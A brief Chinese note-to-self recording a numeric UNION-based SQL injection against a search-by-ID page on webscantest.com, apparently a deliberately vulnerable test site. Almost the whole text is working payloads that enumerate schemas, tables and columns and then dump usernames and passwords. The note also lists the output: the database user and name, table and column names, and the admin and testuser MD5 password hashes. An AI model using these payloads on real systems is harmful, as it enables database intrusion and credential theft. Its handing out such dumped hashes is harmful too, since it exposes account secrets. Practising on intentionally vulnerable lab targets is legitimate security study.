http://www.webscantest.com/datastore/search_by_id.php

记录一下

数字型注入

1 or 1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

1 or 1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

1 or 1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='accounts'

1 or 1 union select 1,group_concat(uname,0x3a,passwd),3,4 from accounts

user() = webscantest@localhost
database() = webscantest
tables = accounts,inventory,orders,products
column_name = id,uname,passwd,fname,lname

admin:21232f297a57a5a743894a0e4a801fc3,testuser:179ad45c6ce2cb97cf1029e212046e81

你可能感兴趣的:(http://www.webscantest.com/datastore/search_by_id.php)